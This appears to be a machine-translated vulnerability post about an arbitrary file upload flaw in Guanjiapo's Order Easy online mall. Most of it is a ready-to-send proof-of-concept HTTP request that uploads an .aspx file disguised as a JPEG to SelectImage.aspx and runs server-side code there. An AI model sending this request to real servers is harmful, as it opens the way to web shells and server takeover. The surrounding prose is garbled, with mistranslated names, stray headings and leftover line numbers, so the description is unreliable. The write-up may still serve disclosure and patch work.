Guanjiapo Order Easy Online Mall Selectimage Aspx Any File Upload Vulnerability
Guanjiapo Order Easy Online Mall Selectimage Aspx Any File Upload Vulnerability
Guanjiapo Order Easy Online Mall SelectImage.aspx Any file upload vulnerability
Vulnerability Description
Ren Woxing was the first to launch an integrated software for Guanjiapo’s purchase, sales and inventory and financial services for small and medium-sized enterprises.
Vulnerability Impact
Buyer Po Order Easy Online Mall
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
7
8
9
10
11
12
POST /DialogTemplates/SelectImage.aspx?type=titleimg&size=30*100&pageindex=1&iscallback=true HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=532c7611457d40f4ae4cd9422973416b
--532c7611457d40f4ae4cd9422973416b
Content-Disposition: form-data; name="Filedata"; filename="TEST.aspx"
Content-Type: image/jpeg
<% Response.Write("Test"); %>
--532c7611457d40f4ae4cd9422973416b--"
This post is licensed under CC BY 4.0 by the author.